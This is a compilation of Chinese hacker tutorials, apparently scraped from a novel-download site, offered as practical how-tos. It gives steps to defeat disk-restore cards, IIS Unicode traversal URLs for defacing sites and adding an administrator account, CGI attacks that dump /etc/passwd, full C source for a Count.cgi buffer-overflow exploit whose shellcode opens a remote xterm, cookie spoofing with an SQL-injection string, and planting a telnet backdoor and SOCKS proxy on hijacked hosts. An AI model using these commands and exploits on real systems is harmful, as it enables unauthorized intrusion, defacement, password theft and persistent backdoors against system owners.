黑客技术

小说下载网 www.uutxt.com
书名:黑客技术
作者:未知
欢迎来本网站下载更多小说.


第一卷 第一章 字数:1812
  ?15秒内破解硬盘还原卡[攻略]
  在网吧上网的朋友一定想保存下载的东东吧,那是那网吧的机器装有还原卡啊。真***。我杀杀杀还原卡!!!!呵呵呵呵…—*…%¥#··%
  那你就看这篇文章吧:)
  原理性的东东我不想在这废话。
  废话不说了
  进入正题
  破解方法有2:
  第一种破解率还可以.
  第二种好像是万能的(俺还没碰到破解不了的----见识短的表现-
  第一种:
  开机时(也就是在你曾经进入cmos的时刻)
  同时按住ctrl+home
  这样你就进入了
  还原卡的密码输入窗口
  只要输入正确的密码即可获得admin
  以后随你怎样设置.
  关于是密码的问题:一般还原卡都有默认密码的
  默认密码怎么找
  很简单
  到网上搜索
  关键词"还原卡"就行了
  找到你用的那个牌子的还原卡
  进入站点
  在一个比较偏僻的角落
  一般可以找到默认密码的.
  而一般机房管理员是不会修改其默认密码的
  比如俺学校的
  台湾远志牌的还原卡的默认密码是12345678
  小哨兵的是manager
  机房管理员一个也没改
  好爽!!!!!!!!!!
  不过我可没破坏任何东东
  一旦惹怒了俺
  嘿嘿....俺也不会破坏的
  恶意破坏计算机就是对自己的不尊重!!!!
  如果管理员把密码改了呢?那就拿出宝刀---
  方法二:
  此法实施过程看起来挺麻烦
  不过熟悉了操作起来超不过15秒的-
  高手sinister曰:
  其实所谓硬盘保护卡就是在ROM中写了一段HOOKINT13的程序,屏蔽了
  一些功能调用如AH=3,5等,在中断向量表中INT13的SEG,OFFSET
  描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码,
  当你AH=2的时,它便会call原始INT13地址来完成操作.
  只要找到原始INT13入口便可以为所欲为.
  不知看了这段感觉如何?慢慢消化吧.
  主要矛盾:关键是要找到原始的int13入口.
  测试操作系统:win98
  测试对象:台湾远志还原卡
  测试地点:学校机房
  测试目的:控制还原卡
  但不破坏.
  注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
  具体过程如下:
  开机过程按住F8键
  进入纯dos环境
  注";"后为注释.
  出现提示符c:
  键入c:\debug
  -a100
  -xorax
  ax
  -int13
  -int3
  ;寻找原始的int13入口.
  然后输入t回车,不断的重复,直到显示的地址形如F000:xxxx
  后面的指令为:movdl
  80(练练眼力-。按q退出.
  记下这一地址
  在(0:13H*4)=0:4cH处填入这个地址。
  例如俺的得到的地址是F000:9A95
  再次运行debug
  键入:
  -e0:4c959A00F0;e的作用将数据表"959A00f0"
  写入地址0:4c开始的字节中.
  -q
  注:填的时候要仔细,填错的话会死机。ok
  破解完成.
  这时在提示符c:\键入
  c:\win
  进入win98系统即可
  那么这次你在win98系统中的一切操作
  随着下一次
  的启动都会被还原卡存储起来。
  不过下一次进入系统的的时候,你还是需要重写地址0:4c
  才可以让还原卡存储你的东东。
  这时只需要在纯dos下进入debug
  键入
  -e0:4c959A00F0
  -q即可。
  哈哈。。。这样也挺好,只有你才是这台computer的真正的主人-。
  别人还是受还原卡的限制的except--you。
  终于over了
  浪费您的时间了,byebye
  后会有期!!!
U优書萌 uutxT.Com 荃蚊子坂粤镀


第一卷 第二章 字数:1952
  ?5分钟学会黑网站
  -BADBOY编写整理.(我觉得unicode漏洞最好学了~^____^)
  如果对放有unicodi漏洞的话:
  先把c:\winnt\system32\cmd.exe拷贝到了c:\inetpub\scripts\ccc.exe拷贝,cmd.exe(必须改名)方法:http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
  这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe
  通过http://ip/scripts/ccc.exe?/c+dir+c:\可以看到c:\文件。
  我们就可以调用到cmd.exe了,就是说不用那个编码了。http://ip/scripts/ccc.exe?/c+echo+Hack+by+Chinese+>+c:\inetpub\wwwroot\default.asphttp://192.168.8.48/scripts/ccc.exe?/c+echo+1/5/2001+>>+c:\inetpub\wwwroot\default.asp
  主页面就被修改成了:
  HackbyChinese
  1/5/2001
  也就是说,已经把他的主页黑了。
  当然,我们也不能只停留在黑主页的地步,当然想进一步控制整个机器了。
  方法:
  编写.bat执行文件:
  1.打开IE,输入:http://ip/scripts/cmd.exe?/cdir怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
  2.http://ip/scripts/cmd.exe?/cechonetuserguest/active:yes>go.bat
  3.http://ip/scripts/cmd.exe?/cechonetuserguestChinese>>go.bat
  4.http://ip/scripts/cmd.exe?/cechonetlocalgroupadministrators/addguest>>go.bat
  5.http://ip/scripts/cmd.exe?/ctypego.bat看看我们的批文件内容是否如下:
  netuserguest/active:yes
  netuserguestChinese
  netlocalgroupadministrators/addguest
  然后在:http://ip/scripts/go.bat
  在磁盘当前位置执行.
  他的guest密码就是“Chinese”而且是超级用户。
  然后你就可以:netuse\\ip\ipc$"Chinese"/user:"guest"
  其余的net命令在这我就不都说了!
  当然你也可以:
  执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\发现列出了远程主机C:\下的所有文件
  执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\autoexec.bat+c:\autoexec.bak成功实现文件的复制,
  执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak成功实现文件的删除他的guest密码就是“Chinese”而且是超级用户。
  然后你就可以:netuse\\ip\ipc$"Chinese"/user:"guest"
  其余的net命令在这我就不都说了!
  多謝E-BADBOY
  就是不懂提高權限到ADMIN.
悠u书擝 uuTXt.Com 铨蚊子扳月读


第一卷 第三章 字数:12913
  ?CGI漏洞向来是容易被人们忽视的问题,同时也是普遍存在的,前不久攻破PCWEEKLINUX的黑客就是利用了CGI的一个漏洞。我就自己所知道的和从外国站点看来的一些CGI漏洞来写一些利用CGI的攻击方法,水平有限写得不对的地方请来信告诉我:bamboo@kali.com.cn
  一、phf.cgi攻击:
  phf是大家所熟悉的了,它本来是用来更新PHONEBOOK的,但是许多管理员对它不了解以至于造成了漏洞。在浏览器中输入:
  http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  可以显示出PASSWD文档来。其实还可以用更好的命令来实现目的:
  http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
  me=&Qoffice_phone=
  http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
  haqr&Qemail=&Qnickname=&Qoffice_phone=
  http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
  %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
  http://thegnome.com/~someuser/passwd
  http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
  =haqr&Qemail=&Qnickname=&Qoffice_phone=
  以上等于执行了命令:
  id
  ls-la~someuser
  cp/etc/passwd~someuser/passwd
  (用普通的可以进入的目录来看passwd)
  rm~someuser/passwd
  二、php.cgi
  除了PHF以外,php也是常见的漏洞,php.cgi2.0beta10或更早版本中,允许anyone以
  HTTP管理员身份读系统文件,在浏览器中输入:
  http://boogered.system.com/cgi-bin/php.cgi?/etc/passwd
  就可以看到想看的文件。
  另外,一部分php.cgi还可以执行shell,原因是它把8kbytes字节放入128bytes的缓冲区中,造成堆栈段溢出,使得攻击者可以以HTTP管理员的身份执行。
  但是只有PHP作为CGI脚本时才能实现,而在作为Apache模量是不能运行的。想检查能否运行,只要在浏览器中输入:
  http://hostname/cgi-bin/php.cgi
  如果你看到返回这样的字样就可以运行:
  PHP/FIVersion2.0b10
  ...
  三、test-cgi的问题
  test-cgi同样是个常常出现的漏洞,在浏览器中输入:
  http://thegnome.com/cgi-bin/test-cgi?\whatever
  将会返回:
  CGI/1.0testscriptreport:
  argcis0.argvis.
  SERVER_SOFTWARE=NCSA/1.4B
  SERVER_NAME=thegnome.com
  GATEWAY_INTERFACE=CGI/1.1
  SERVER_PROTOCOL=HTTP/1.0
  SERVER_PORT=80
  REQUEST_METHOD=GET
  HTTP_ACCEPT=text/plain,application/x-html,application/html,
  text/html,text/x-html
  PATH_INFO=
  PATH_TRANSLATED=
  SCRIPT_NAME=/cgi-bin/test-cgi
  QUERY_STRING=whatever
  REMOTE_HOST=fifth.column.gov
  REMOTE_ADDR=200.200.200.200
  REMOTE_USER=
  AUTH_TYPE=
  CONTENT_TYPE=
  CONTENT_LENGTH=
  再来一次,这样输入:
  http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
  看到PASSWD了?
  用netcat80端口进行攻击:
  machine%echo"GET/cgi-bin/test-cgi?/*"|ncremoved.name.com80
  返回:
  CGI/1.0testscriptreport:
  argcis1.argvis/\*.
  SERVER_SOFTWARE=NCSA/1.4.1
  SERVER_NAME=removed.name.com
  GATEWAY_INTERFACE=CGI/1.1
  SERVER_PROTOCOL=HTTP/0.9
  SERVER_PORT=80
  REQUEST_METHOD=GET
  HTTP_ACCEPT=
  PATH_INFO=
  PATH_TRANSLATED=
  SCRIPT_NAME=/bin/cgi-bin/test-cgi
  QUERY_STRING=/a/bin/boot/bsd/cdrom/dev/etc/home/lib/mnt
  /root/sbin/stand/sys/tmp/usr/usr2/var
  REMOTE_HOST=remote.machine.com
  REMOTE_ADDR=255.255.255.255
  REMOTE_USER=
  AUTH_TYPE=
  CONTENT_TYPE=
  CONTENT_LENGTH=
  显示出了根目录!这样试试:
  machine%echo"GET/cgi-bin/test-cgi?*"|ncremoved.name.com80
  返回:
  CGI/1.0testscriptreport:
  argcis1.argvis\*.
  SERVER_SOFTWARE=NCSA/1.4.1
  SERVER_NAME=removed.name.com
  GATEWAY_INTERFACE=CGI/1.1
  SERVER_PROTOCOL=HTTP/0.9
  SERVER_PORT=80
  REQUEST_METHOD=GET
  HTTP_ACCEPT=
  PATH_INFO=
  PATH_TRANSLATED=
  SCRIPT_NAME=/bin/cgi-bin/test-cgi
  QUERY_STRING=calendarcgi-archiecgi-calendarcgi-datecgi-finger
  cgi-fortunecgi-lib.plimagemapimagemap.cgiimagemap.confindex.html
  mail-querymail-query-2majordomomajordomo.cfmarker.cgi
  menumessage.cgimunger.cgimunger.notencsa-default.tarpost-query
  querysmartlist.cfsrcsubscribe.cftest-cgiuptime
  REMOTE_HOST=remote.machine.com
  REMOTE_ADDR=255.255.255.255
  REMOTE_USER=
  AUTH_TYPE=
  CONTENT_TYPE=
  CONTENT_LENGTH=
  显示了/CGI-BIN/目录下的东西。
  CGI漏洞的利用(二)
  CGI漏洞向来是容易被人们忽视的问题,同时也是普遍存在的,前不久攻破PCWEEKLINUX的黑客就是利用了CGI的一个漏洞。我就自己所知道的和从外国站点看来的一些CGI漏洞来写一些利用CGI的攻击方法,水平有限写得不对的地方请来信告诉我:bamboo@kali.com.cn
  四、Count.cgi溢出漏洞
  Count.cgi(wwwcount)是国外网站经常用的CGI网页计数程序,国内很少有人用它,不过还是有一些网站的CGI-BIN目录下有它,简单说一下它的原理以及利用方法。
  出现问题主要是由于QUERY_STRING环境变量被复制到一个活动缓冲区,造成溢出,允许远程用户以HTTP管理员的身份执行任意命令。
  有人写了个程序来利用这个漏洞,只对Count.cgi24以下版本有效:
  /*###count.c########################################################*/
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  /*Forwards*/
  unsignedlonggetsp(int);
  intusage(char*);
  voiddoit(char*,long,char*);
  /*Constants*/
  charshell[]=
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
  "\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
  "\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
  "\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
  "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
  "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
  "/usr/X11R6/bin/xterm0-ut0-display0";
  charendpad[]=
  "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
  "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  intmain(intargc,char*argv[]){
  char*shellcode=NULL;
  intcnt,ver,retcount,dispnum,dotquads[4],offset;
  unsignedlongsp;
  chardispname[255];
  char*host;
  offset=sp=cnt=ver=0;
  fprintf(stderr,"\t%s-Gus\n",argv[0]);
  if(argc
  while((cnt=getopt(argc,argv,"h:d:v:o:"))!=EOF){
  switch(cnt){
  case'h':
  host=optarg;
  break;
  case'd':
  {
  retcount=sscanf(optarg,"%d.%d.%d.%d:%d",
  &dotquads[0],
  &dotquads[1],
  &dotquads[2],
  &dotquads[3],&dispnum);
  if(retcount!=5)usage(argv[0]);
  sprintf(dispname,"%03d.%03d.%03d.%03d:%01d",
  dotquads[0],dotquads[1],dotquads[2],dotquads[3],dispnum);
  shellcode=malloc(strlen((char*)optarg)+strlen(shell)+strlen(endpad));
  sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
  }
  break;
  case'v':
  ver=atoi(optarg);
  break;
  case'o':
  offset=atoi(optarg);
  break;
  default:
  usage(argv[0]);
  break;
  }
  }
  sp=offset+getsp(ver);
  (void)doit(host,sp,shellcode);
  exit(0);
  }
  unsignedlonggetsp(intver){
  /*Getthestackpointerweshouldbeusing.YMMV.Ifitdoesnotwork,
  tryusing-oX,wherexisbetween-1500and1500*/
  unsignedlongsp=0;
  if(ver==15)sp=0xbfffea50;
  if(ver==20)sp=0xbfffea50;
  if(ver==22)sp=0xbfffeab4;
  if(ver==23)sp=0xbfffee38;/*Dunnoaboutthisone*/
  if(sp==0){
  fprintf(stderr,"Idon'thaveanspforthatversiontryusingthe-ooption.\n");
  fprintf(stderr,"Versionsabove24arepatchedforthisbug.\n");
  exit(1);
  }else{
  returnsp;
  }
  }
  intusage(char*name){
  fprintf(stderr,"\tUsage:%s-hhost-d]\n",name);
  fprintf(stderr,"\te.g.%s-hwww.foo.bar-d127.0.0.1:0-v22\n",name);
  exit(1);
  }
  intopenhost(char*host,intport){
  intsock;
  structhostent*he;
  structsockaddr_insa;
  he=gethostbyname(host);
  if(he==NULL){
  perror("Badhostname\n");
  exit(-1);
  }
  memcpy(&sa.sin_addr,he->h_addr,he->h_length);
  sa.sin_port=htons(port);
  sa.sin_family=AF_INET;
  sock=socket(AF_INET,SOCK_STREAM,0);
  if(sock
  perror("cannotopensocket");
  exit(-1);
  }
  bzero(&sa.sin_zero,sizeof(sa.sin_zero));
  if(connect(sock,(structsockaddr*)&sa,sizeofsa)
  perror("cannotconnecttohost");
  exit(-1);
  }
  return(sock);
  }
  voiddoit(char*host,longsp,char*shellcode){
  intcnt,sock;
  charqs[7000];
  intbufsize=16;
  charbuf[bufsize];
  charchain[]="user=a";
  bzero(buf);
  for(cnt=0;cnt
  qs[cnt+0]=sp&0x000000ff;
  qs[cnt+1]=(sp&0x0000ff00)>>8;
  qs[cnt+2]=(sp&0x00ff0000)>>16;
  qs[cnt+3]=(sp&0xff000000)>>24;
  }
  strcpy(qs,chain);
  qs[strlen(chain)]=0x90;
  qs[4104]=sp&0x000000ff;
  qs[4105]=(sp&0x0000ff00)>>8;
  qs[4106]=(sp&0x00ff0000)>>16;
  qs[4107]=(sp&0xff000000)>>24;
  qs[4108]=sp&0x000000ff;
  qs[4109]=(sp&0x0000ff00)>>8;
  qs[4110]=(sp&0x00ff0000)>>16;
  qs[4111]=(sp&0xff000000)>>24;
  qs[4112]=sp&0x000000ff;
  qs[4113]=(sp&0x0000ff00)>>8;
  qs[4114]=(sp&0x00ff0000)>>16;
  qs[4115]=(sp&0xff000000)>>24;
  qs[4116]=sp&0x000000ff;
  qs[4117]=(sp&0x0000ff00)>>8;
  qs[4118]=(sp&0x00ff0000)>>16;
  qs[4119]=(sp&0xff000000)>>24;
  qs[4120]=sp&0x000000ff;
  qs[4121]=(sp&0x0000ff00)>>8;
  qs[4122]=(sp&0x00ff0000)>>16;
  qs[4123]=(sp&0xff000000)>>24;
  qs[4124]=sp&0x000000ff;
  qs[4125]=(sp&0x0000ff00)>>8;
  qs[4126]=(sp&0x00ff0000)>>16;
  qs[4127]=(sp&0xff000000)>>24;
  qs[4128]=sp&0x000000ff;
  qs[4129]=(sp&0x0000ff00)>>8;
  qs[4130]=(sp&0x00ff0000)>>16;
  qs[4131]=(sp&0xff000000)>>24;
  strcpy((char*)&qs[4132],shellcode);
  sock=openhost(host,80);
  write(sock,"GET/cgi-bin/Count.cgi?",23);
  write(sock,qs,strlen(qs));
  write(sock,"HTTP/1.0\n",10);
  write(sock,"User-Agent:",12);
  write(sock,qs,strlen(qs));
  write(sock,"\n\n",2);
  sleep(1);
  /*printf("GET/cgi-bin/Count.cgi?%sHTTP/1.0\nUser-Agent:%s\n\n",qs,qs);*/
  /*
  setenv("HTTP_USER_AGENT",qs,1);
  setenv("QUERY_STRING",qs,1);
  system("./Count.cgi");
  */
  }
  ------------------------------------
  用法是:count-h
  例如:count-hwww.foo.bar-d127.0.0.1:0-v22
  五、用Count.cgi看图片
  这个不算是很有用的漏洞,可是既然写到这儿了,也就顺便提一下吧。可以利用Count.cgi看WEB目录以外的图片,据作者说有一些商业网站的图片里有一些商业机密,所以这个漏洞也算是有点用处吧!哈哈!
  在浏览器中这样输入:
  其中/path_to_gif/file.gif是你要看的图片的路径。
  注意,这一漏洞只能被用来看(或下载)GIF格式的图片,而不能用于其他类型的文件。
uU書萌 uuTxt.COM 铨纹自版粤渎


第一卷 第四章 字数:4401
  ?现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9
  和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。
  COOKIE欺骗原理
  按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通
  讯协议无影响,所以要进行cookie欺骗可以有多种途径:
  1、跳过浏览器,直接对通讯数据改写
  2、修改浏览器,让浏览器从本地可以读写任意域名cookie
  3、使用签名脚本,让浏览器从本地可以读写任意域名cookie(有安全问题)
  4、欺骗浏览器,让浏览器获得假的域名
  其中:
  方法1、2需要较专业的编程知识,对普通用户不太合适。
  方法3的实现有2种方法:
  1、直接使用签名脚本,不需要签名验证,但是产生很严重的安全问题,因为大家都要上网
  的,如果这样做你的硬盘文件就……
  2、对脚本进行签名后再使用签名脚本,但是需要专用的数字签名工具,对普通用户也不合
  适。
  方法4看样子应该是最合适的了,域名欺骗很简单,也不需要什么工具(当然如果你的机器
  装有web服务器那更好了),下面我以the9为例,以这种方法为基础,阐述一下cookie欺骗的
  过程(下文中提到的任何服务端的bug,the9都已经做了改进,所以本文对the9无安全方面的
  影响):
  注:我们讨论的cookie是那种不会在硬盘的cookie文件里留下踪迹的cookie,就是那种只在
  浏览器生存周期内(会话)产生的cookie,如果浏览器关闭(会话结束)那么这个cookie就
  被删了!
  COOKIE欺骗实战
  the9在登陆的时候会返回3个cookie(这可把浏览器的警告cookie选项打开时看到):
  cgl_random(随即序列号):登陆识别的记号
  cgl_loginname(登陆名):身份的识别记号
  cgl_areaid(小区号):你居住的小区号码
  只要把cgl_loginname填入正确的登陆名,再对cgl_random进行修改,就可以达到欺骗服务程
  序的目的。
  一般欺骗php程序的字符串为:
  1''or''1''=''1
  把这个填入cgl_random,服务程序就被欺骗了!
  因为服务程序不太可能对cookie进行语法检查(the9现在改进了),那么把这个字符串填入
  ,就可以成功的欺骗对方程序,而达到突破的目的了!
  现在的问题是,如何使浏览器把这个我改过的cookie返回给the9?
  看一看the9的域名吧:http://www.the9.com/,而浏览器的cookie警告已经告诉了我们这3
  个cookie会返回给有.the9.com这个域名的服务器,哎?我的机器上正好有web服务器,那么
  动手吧!
  先编一个设置cookie的html,就叫cookie.htm吧,然后把这个cookie放进web目录,这样还不
  行,因为我的机器的域名没设,那么设置host的名字,可是如果在网络设置中进行设置的话
  ,机器要重启动的,还是想想别的简单的办法吧!
  然后我们应该编辑hosts文件,这个文件应该在windows目录下,你有可能找不到它,但是如
  果你找到了hosts.sam文件,那么把它后面的扩展名去掉,就是我们要的文件了!
  编辑hosts文件,填入以下一行:
  127.0.0.1www0.the9.com
  解释一下,127.0.0.1是本机的lo地址,可以用做web地址,而www0.the9.com就是我们欺骗产
  生的域名。
  然后在浏览器中输入http://www0.the9.com/cookie.htm,看,页面出来了,快设置cookie吧
  !
  直接访问http;//www.the9.com/main.htm看看,不错吧!
  但是不是所有的网友都有自己的web服务器啊!那怎么办呢?
  其实如果你有个人主页的话,也可以达到cookie欺骗的目的,比如某个个人主页的服务器的
  ip地址是1.2.3.4,先上传cookie.htm文件,再编辑hosts文件:
  1.2.3.4www0.the9.com
  然后访问http://www0.the9.com/***/cookie.htm,其中***是你个人主页的地址目录。
  对了我作了个工具在我的主页上,现在公开一下,http://home.etang.com/fsl/9the/,大家
  知道该怎么做了吧?嘿嘿,不过你那样设置是没有用的,要这样编辑hosts:
  etang的ipwww.the9.com
  the9的ipwww0.the9.com
  为什么要这样呢?我等会会告诉大家的
  继续the9的cookie讨论,还有2个cookie:
  cgl_mainshowinfo(个人信息)
  cgl_showinfo_changed(意义不知)
  由于第二个cookie不知道是什么,所以就讨论第一个。
  第一个cookie存放着你在the9的名字、称号、居住的小区、街道、是否有工作、星级、门牌
  号等的信息(目前只知道这些,其余的信息不知其意义,具体格式就让给大家去分析了),
  但是中文都escape过了,如果你用的不是netscpae而是ie的话,不能用unescape得知其信息
  ,因为ie对双字节采用unicode而不采用ascii,如果哪天the9也支持unicode就好了!:),
  但是其他网站站长注意了,你们可通过cgi的形式把这些the9居民信息抓过来实现数据共享!
  哈哈……,如果你们真要这么做,就只有使用签名脚本了,总不能让别人编辑hosts吧(不过
  得注意版权哦!)?
  ie的cookie漏洞:
  如果你用的是ie的话,由于ie本身的漏洞,你大可不必编辑hosts,就可以同样做到读写别的
  域名的cookie,你可以使用以下的方法欺骗ie(具体的可以去www.cookiecentral.com看看)
  :
  假设你的主页文件为http://a.com/cookie.htm,
  使用以下url:http://a%2Ecom%2Fcookie%2Ehtm%3F.the9.com
  如果直接输在浏览器地址栏里不行,就作个script,把location的值设为这个就可以了!
  这个地址转换后应该是这样的:http://a.com/cookie.htm?.the9.com
  由于ie的bug,误把前面那个的域名以为是.the9.com了!
  hosts文件解释
  hosts文件实际上可以看成一个本机的dns系统,它可以负责把域名解释成ip地址,它的优先
  权比dns服务器要高,它的具体实现是TCP/IP协议中的一部分。
  如果有这么一行:
  202.109.110.3www.the9.com
  那么在输入www.the9.com时,网络协议会首先检查hosts文件找到匹配的,如果找不到再去d
  ns查,这样你访问www.the9.com实际上是访问202.109.110.3,而不是通常的202.109.110.2
  。
  注:由于缓存的作用,如果开着浏览器编辑hosts的话,hosts里的内容有可能不会当场生效
  ,你可以重新启动浏览器或等一会时间再试一下!
  关于REFERER的欺骗(这个虽然不属于cookie欺骗,但是懒得再写一篇,就归在一起
  了)
  referer是http头,它的作用是签定用户是从何处引用连接的,在the9,服务程序就充分利用
  了这一点,如过你是手动输入url的话,那么referer不会设任何值,服务程序就返回什么“
  投机取巧”的字样!
  由于我们前面对浏览器进行了域名欺骗,那么referer也被欺骗了,但是服务程序对referer
  是整个主机名检查,所以www0.the9.com的域名就欺骗不了服务器,所以得用www.the9.com欺
  骗,那么还得设一个域名方便我们访问the9,而且还得让cookie返回给这个真的the9,那么
  就用www0.the9.com吧!(这回知道前面访问我主页工具时要那样编辑hosts了吧?)
  如果你用了这个方法的话,那么你就不能直接点击the9的连接,而得用工具中的地址欺骗来
  进行访问,至于这样做的好处,大家自己找找吧,我就不想详细说了,太累了!
  关于netvampire:
  这个下载工具大家都知道吧?那么它的3.3版大家用过吗?很棒的!因为它可以直接让大家改
  变下载连接的referer,而且它还能继承浏览器的cookie,把cookie返回给服务端(不过coo
  kie不能改,如果能改的话,这个工具就太………………)
  后记
  好了关于cookie及referer就说到这了,在这个星期以前利用cookie欺骗的话the9的门户可是
  大开的(当然似乎还有通用密码什么的),不过the9虽然改进了,我不能保证其他社区网也
  改进了,当然本文只是探讨技术,不负什么法律责任
悠U书盟 uuTxT.cOm 全蚊子扳粤渎


第一卷 第五章 字数:2892
  ?序:因为贴出《如何入侵能建立IPC$空衔接的主机》后,信仰2提意见说贴一些教制作跳板的,所以就有了这篇帖子:)
  前提条件:找到能建立IPC空衔接的主机,如何找到请参阅《如何入侵能建立IPC$空衔接的主机》,我的主页上也有,网址是:topcoooler.51.net
  需要工具:
  Sksockserver.exe下载地址:http://snake12.top263.net/SkSockServer/SkSockServer1.06.zip28KB
  1:开启CMD.EXE,然后在流光的目录找到SRV.EXE(C:files.exe)将srv.exe拷到C目录,还有将sksockserver.exe也拷到C目录里,最好都改个名字,这样改了名字就没这么容易被发现了。现在就可以输入netuse\XXX.XXX.XXX.XXX$"密码"/user:用户名",如果成功的话将出现“命令完成”。
  (注:NETUSE\ip$密码/user:用户名字)
  2:将将SRV.EXE和sksockserver.exe拷到主机的SYSTEM32目录里。
  命令为:C:\srv.exe\\XXX.XXX.XXX.XXX\admin$\system32
  C:\sksockserver.exe\\XXX.XXX.XXX.XXX\admin$\system32
  成功拷贝的话,将会出现:“已复制1个文件”的提示。
  这个过程大概需要几分钟,等等吧:)
  3:输入nettime\\XXX.XXX.XXX.XXX
  这样我们就得到了主机的本地时间。
  4:输入at\\XXX.XXX.XXX.XXX时间要运行的程式(记得时间是用主机的本地时间,一定要输入比本地时间迟几分钟!!!这样过几分钟后该程式将自动执行,还有,时间是按照国际时间的),出现添加了一项作业,其作业ID-1,就表示已经增加了作业!!
  如果要取消作业,输入at\XXX.XXX.XXX.XXXID号码/del
  5:过几分钟,输入at\\XXX.XXX.XXX.XXX查看刚才要执行任务的情况,可以看到如下内容:
  状态ID日期时间命令行
  -----------------------------------
  这就表示任务已经执行了!!
  6:现在可以输入telnetXXX.XXX.XXX.XXX99(刚才执行的srv.exe就是用来打开99端口的)!!很快的,我们将可以进入目标的电脑系统了:)
  这是显示为:
  C:\WINNT\system32>
  7:这是键入:C:\WINNT\system32>sksockserver-install
  注意:现在不会显示你已经输入的命令文字,放心,这是正常的。然后按ENTER!
  8:现在来指定打开哪个端口,你可以用1199,2001等端口,也可以按下面输入:
  C:\WINNT\system32>
  C:\WINNT\system32>sksockserver.exe-configport1127
  这时屏幕显示:
  ThePortvalvesetto1127
  注:可以跳过以上步骤,默认端口是1813!!!
  9:这时就输入:
  C:\WINNT\system32>sksockserver-configstarttyte2
  屏幕显示:
  TheNewStartTypehavesetto2--Auto
  这样就不怕目标重新启动系统后你的跳板就停止运行:)
  10:依照下面输入,你就拥有了自己的跳板了:)
  命令为:
  C:\WINNT\system32>
  C:\WINNT\system32>netstartskserver
  屏幕显示:
  TheSnakeSockProxyServiceserviceisstarting.
  TheSnakeSockProxyServiceservicewasstartedsuccessfully.
  11:现在要离开这台主机了,连接太久容易被发现嘛:)
  输入:
  netuse\\XXX.XXX.XXX.XXX/del
  屏幕显示:
  \\XXX.XXX.XXX.XXX已经删除。
  你也可以检查一下,输入:
  netuse
  屏幕显示:
  会纪录新的网络连接。
  清单是空的
